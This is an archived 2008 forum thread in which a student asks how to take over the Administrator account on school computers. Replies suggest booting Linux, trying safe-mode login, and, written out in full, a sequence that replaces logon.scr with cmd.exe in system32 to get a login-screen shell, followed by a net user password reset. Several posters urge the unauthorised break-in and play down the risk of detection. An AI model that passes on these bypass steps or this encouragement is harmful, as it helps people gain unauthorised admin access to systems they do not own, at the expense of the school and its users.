Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking (http://www.go4expert.com/forums/ethical-hacking-forum/)
-   -   Need help with CMD school network hacking (http://www.go4expert.com/forums/help-cmd-school-network-hacking-t13948/)

Denver Jackson 16Sep2008 23:30

Need help with CMD school network hacking

Hello,

I know how to get onto cmd at school and when i type in net user it comes with all the users (eg. Administrator) i then type in net user Administrator * and press enter.
It comes up type new password i do that then confirm it.

Here is the problem it then says "System Error 5" "Access Denied "

Anyone with any help on how to get past this it will be appreciated.

cpulocksmith 17Sep2008 01:41

Re: Need help with CMD school network hacking

hay kid i dont mean any disrespect but why do you wanna hack the school network? you want to get to the admin files i know that but why? what is on there that you want to get at? or do you just wanna do it for kicks? if so i really have no problem with it but it may not be worth the risk. if they do catch you screwing with the admin files you could get expelled. and as far as i know expelled == bad. and if you still wanna go through with this then why dont you start by finding out that error 5 is. that can be dont easily via google. i really dont mean any disrespect by this i just dont know what is up with kids wanting to hack the school computers.

XXxxImmortalxxXX 22Sep2008 21:21

its because they are blocking your privalages in which u can only do so much i know some cools use deep freeze to stop ppl from doing such also a little hint the network admin at the board of ur schools keeps records of every account and what all they do so id watch out if i was u

SpOonWiZaRd 25Sep2008 12:41

have you tried to use net user Administrator [new pass] before?

XXxxImmortalxxXX 25Sep2008 20:39

new pass will still deny it its basically the same command as net user blahh newpassword

germanboy104 27Oct2008 17:57

Hey man, i gots da same problem at my school......
but MS-DOS wont allow u to change the password purely because u dont have admin rights.
y wouldnt u want the admin password anyway?! u could do so much more!

gettin the admin password is pretty easy......just download ubuntu ur someother linux based OS, then boot ur system off that.....along the process, the new system will give u the admin. password.

u can log on as an admin......but as far as accessing network drives, ur school's IT team may have assigned a password to them, so that u may not access them without yet another password......

SpOonWiZaRd 27Oct2008 19:20

try safemode login, sometimes the Admin account has a password but the Administrator account doesn't, It worked a couple of times for me...

germanboy104 28Oct2008 17:55

Re: Need help with CMD school network

Quote:

Originally Posted by cpulocksmith
hay kid i dont mean any disrespect but why do you wanna hack the school network? you want to get to the admin files i know that but why? what is on there that you want to get at? or do you just wanna do it for kicks? if so i really have no problem with it but it may not be worth the risk. if they do catch you screwing with the admin files you could get expelled. and as far as i know expelled == bad. and if you still wanna go through with this then why dont you start by finding out that error 5 is. that can be dont easily via google. i really dont mean any disrespect by this i just dont know what is up with kids wanting to hack the school computers.

im in school right now, and 2 b honest, whats the easiest system uve ever ed?
if ur inclass and youre bored, why not spend some time tryin 2 figure out some and stuff?!
furthermore, how would u get caught?! There are IP traces u can run to find who has messed with files, windows has utilitys to find this stuff 2. But really, with school IT programs, who there would really have the Know How to do that?! and even if they did, school computers get used by multiple students every day!! its almost impossible to track!! :crazy:

"the definition of IT in any school is merely counting on the students to lack the technical experience to do any damage to their equipment" :p

SpOonWiZaRd 29Oct2008 11:24

Try this, might work, it worked for me a few times:

cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Then do this:

net user <admin account name here> password

and you have the admin password.

neo_vi 29Oct2008 15:20

Quote:

Originally Posted by SpOonWiZaRd
Try this, might work, it worked for me a few times:

cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Then do this:

net user <admin account name here> password

and you have the admin password.

It never helped me. I tried it twice in my network. It returned some error.